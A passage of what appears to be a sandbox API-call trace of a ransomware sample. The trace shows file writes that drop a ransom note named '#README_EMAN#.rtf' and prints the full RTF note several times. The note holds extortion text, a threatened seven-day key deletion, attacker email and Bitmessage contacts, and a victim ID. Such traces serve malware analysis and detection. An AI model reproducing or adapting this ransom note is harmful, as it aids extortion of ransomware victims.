Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0203.672] WriteFile (in: hFile=0x2f0, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0203.672] CloseHandle (hObject=0x2f0) returned 1 [0203.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\#readme_eman#.rtf")) returned 0xffffffff [0203.673] GetLastError () returned 0x2 [0203.673] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f8 [0204.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0204.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0204.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry 